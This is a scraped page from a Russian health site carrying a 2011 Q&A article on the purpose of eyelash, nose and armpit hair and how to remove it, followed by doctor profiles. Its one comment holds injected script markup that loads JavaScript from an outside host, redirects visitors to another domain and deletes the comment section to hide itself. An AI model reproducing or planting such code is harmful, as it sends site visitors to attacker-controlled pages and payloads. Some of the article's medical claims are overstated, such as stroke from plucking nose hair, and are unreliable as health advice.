Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Зачем нам волосы?  >>  Зачем нам волосы?
 
Обратная связь
 

Зачем нам волосы?

Размер шрифта
15 декабря 2011 08:00
  • google_analytics: false
  • Нравится

Человек давно сменил густую шерсть на красивую одежду, но все-таки волосы на нашем теле остались, хоть и не всегда понятно, для чего. Зачем же нам волосы и как с ними правильно бороться.

Ресницы Зачем они нам?

- Чтобы защищать наши глаза от соринок и микробов. Нужно ли стричь ресницы, чтобы они стали гуще и длиннее?

- Это миф! Нет никаких научных доказательств, что подстригание ресниц приведет к их быстрому росту. Они отрастут, но только до прежней длины. Тем более это очень опасно! Вы будете держать ножницы рядом с глазом, на расстоянии меньше 1 см! Маленькая случайность – и вы можете лишиться зрения.

Волосы в носу. Зачем они нам?

- Волосы в носу препятствуют попаданию в легкие чужеродных частиц через носовые проходы. Нужно ли удалять волосы в носу?

- Нежелательно! При выдирании из носа волос через ранку могут попасть бактерии и инфекции, а через сосуд – попасть в мозг и вызвать инсульт!

- Для удаления волос нужно пользоваться специальным триммером, который их просто подрезает. Нос будет выглядеть более эстетично, а волосики при этом останутся и будут защищать вас от инфекций и микробов.

Волосы в подмышках. Зачем они нам?

- Волосы снижают трение рук об тело, когда мы их сгибаем. Потовые железы, кстати, выполняют ту же функцию: увлажняя наши подмышки, они обеспечивают скольжение рук, снижая силу трения.

Нужно ли удалять волосы в подмышках?

- Можно, но не бритвой, поскольку бактерии в подмышках попадают в открытые ранки после бритья, и может начаться инфекция.

- Удалять волосы в подмышках следует с помощью специальных кремов.

Видеосюжеты по теме:

Волосы и волосики. Зачем они нам нужны

 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:03

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Трихотилломания: потеря волос на нервной почве   Лечение выпадения волос   Типы выпадения волос   О проблеме выпадения волос  

Слайдшоу

1
Супереда для волос
Как лечить выпадение волос
Причины выпадения волос

Тесты

Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.